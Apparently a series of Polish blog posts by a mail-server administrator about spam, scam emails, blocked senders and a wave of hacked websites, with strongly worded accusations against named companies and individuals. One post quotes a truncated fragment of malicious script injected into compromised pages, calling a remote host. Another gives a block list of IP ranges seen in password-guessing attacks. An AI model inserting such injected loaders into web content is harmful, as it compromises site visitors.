"jak założyć piramidę finansową". W sumie nic w tym dziwnego, tylko tyle, że wchodził z IP należącego do PZU: proxy2.pzu.pl.[193.109.244.28]

nie działa od 3 lat! admini, którzy go nadal używają to chyba od 3 lat nie zaglądali do swojego serwera poczty! hańba im!

Tego newsa powinienem napisać już dawno,, jakieś 2 lata temu. Freshmail.pl to system rozsyłania kampanii marketingowych/mailingów. Czyli właśnie - spamu. Do freshmaila zgłaszają się klienci posiadający własną bazę adresów e-mail a freshmail realizuje wysyłkę newslettera. Pomimo tego, że "FreshMail sprawdzi, czy Twoja wysyłka nie jest spamem" co akurat u mnie powoduje napady ROTFLa - klienci freshmaila a zatem i sam freshmail - rozsyłają spam. Dlaczego ROTFLa? Bo od samych początków freshmaila jego serwery są blokowane na moich serwerach poczty. I każda kampania marketingowa jest na moich serwerach poczty traktowana jako spam. A freshmail ponawia wysyłkę (nie)swojego spamu pomimo tego, że zawsze otrzymuje stosowny komunikat o niemożliwości dostarczenia przesyłki.

A teraz fakt: freshmail realizował wysyłkę spamu politycznego do użytkowników których dane wyciekły z bazy wrocławskiej karty miejskiej.

czyli mailing piwnicy win rozesłany między innymi do sklepu handlującego zabawkami dla dzieci...

trafiłem na takiego referera z wyszukiwarki google:

co to znaczy, że adres IP jest na liście spamerów? Ja nic nie spamowałam!

co to znaczy, że adres IP jest na czarnej liście? Jak znaleźć tego, który wysyłał spam?

tłumacząc: "się zepsuło bo było przepięcie w sieci", nosz xhejn - szwagier ma płytę grzewczą indukcyjną, w jej instrukcji pisze, że "wytrzymuje niewielkie skoki napięcia". A instalację elektryczną ma zabezpieczoną bezpiecznikiem B+C SPB-12/280/4 - jak xhejn może być taki skok napięcia, który zniszczy płytę? I dlaczego nic innego mu się w domu nie przepaliło w tym momencie? To producenci wsadzają do środka chińskie gówno a potem serwisy ściemniają...

freshmail.pl to taki serwis umożliwiający wysyłanie mailingów. Moje logi są pełne spamu z ich serwerów.

Nie dość, że obiecują spadek/skarb ("wystarczy tylko opłacić biurokrację/dać łapówkę"); chcą kupić towary - nieważne jakie, ważne, że już więcej tego towaru nie zobaczysz (kasy też); to jeszcze oferują usługi kurierskie. W sumie pomysł zajebisty - taki kontener towaru może być warty np. 100k złotych.

Dostałem dzisiaj emaila z prośbą o wsparcie finansowe dla Pawełka Jędrzejczaka. Dziwne jest to, że email został wysłany na adres biuro@ a ja biura nie prowadzę - mój adres został kupiony od spamerów. Z logów serwera pocztowego widzę, że takie emaile są wysyłane MASOWO. Emaile są rozsyłane aż z dwóch wielu serwerów w Netarcie.

Podana w emailu domena dlapawelka.info.pl jest utrzymywana na serwerach home, ale odpowiada kodem 403 Forbidden, domeny zarejestrowane są przez spółkę z Warszawy zajmującą się transportem - obecnie w likwidacji (?), email wysłał gość z Leszna a dziecko niby ma być w Poznaniu.

Istnieją jeszcze co najmniej 2 domeny: dlapawelka.eu, dlapawelka.com.pl .

Skąd ja mam wiedzieć, czy Paweł Jędrzejczak istnieje i ten email nie jest wyłudzeniem pieniędzy?
I skąd ja mam wiedzieć, że pieniądze pójdą na leczenie a nie na kupno nowych usług spamerskich?

Update: 2015-01-13 Przypadkowo natknąłem się na informację, że poznańska policja prowadzi śledztwo w sprawie oszustwa. Poszkodowanych jest około 3000 osób.

info na temat włamania

mam wysiew "zaatakowanych" stron. bez zgadywania [hasel] z 1 ip. wymienia wszystkie htmle/phpy. najprawdopodobniej login / hasło (do ftp) kradnie z historii poczty.

[script]var url="http://onmouseup.info/stats.php";...[/script]

Jeden z moich znajomych odsyła spamerom następujący liścik

dla wszystkich portów poczty: 25,110,143,465,587,993,995 oraz do .htaccessa przy webmailu:
42.48.0.0/15
110.52.0.0/15
115.48.0.0/12
118.112.0.0/13
125.40.0.0/13
182.128.0.0/12
183.0.0.0/10
222.136.0.0/13
Z tych sieci ostatnimi czasy widzę w logach mnóstwo ataków słownikowych na hasła userów poczty. I jak mówię "mnóstwo" to mam na myśli "o ja pierdolę".

który podszywa się pod twoją domenę w nagłówkach?

Dodając do konfiga następującą zmienną:

%smtp_reason_by_ccat = (
CC_VIRUS, 'id=%n, %x see http://www.lemat.priv.pl/spam/',
CC_BANNED, 'id=%n, %x see http://www.lemat.priv.pl/spam/',
CC_UNCHECKED, 'id=%n, %x see http://www.lemat.priv.pl/spam/',
CC_SPAM, 'id=%n, %x see http://www.lemat.priv.pl/spam/',
CC_SPAMMY, 'id=%n, %x see http://www.lemat.priv.pl/spam/',
CC_BADH.",2", 'id=%n, %x see http://www.lemat.priv.pl/spam/',
CC_BADH, 'id=%n, %x see http://www.lemat.priv.pl/spam/',
CC_OVERSIZED, 'id=%n, %x see http://www.lemat.priv.pl/spam/',
CC_CATCHALL, 'id=%n, %x see http://www.lemat.priv.pl/spam/',
);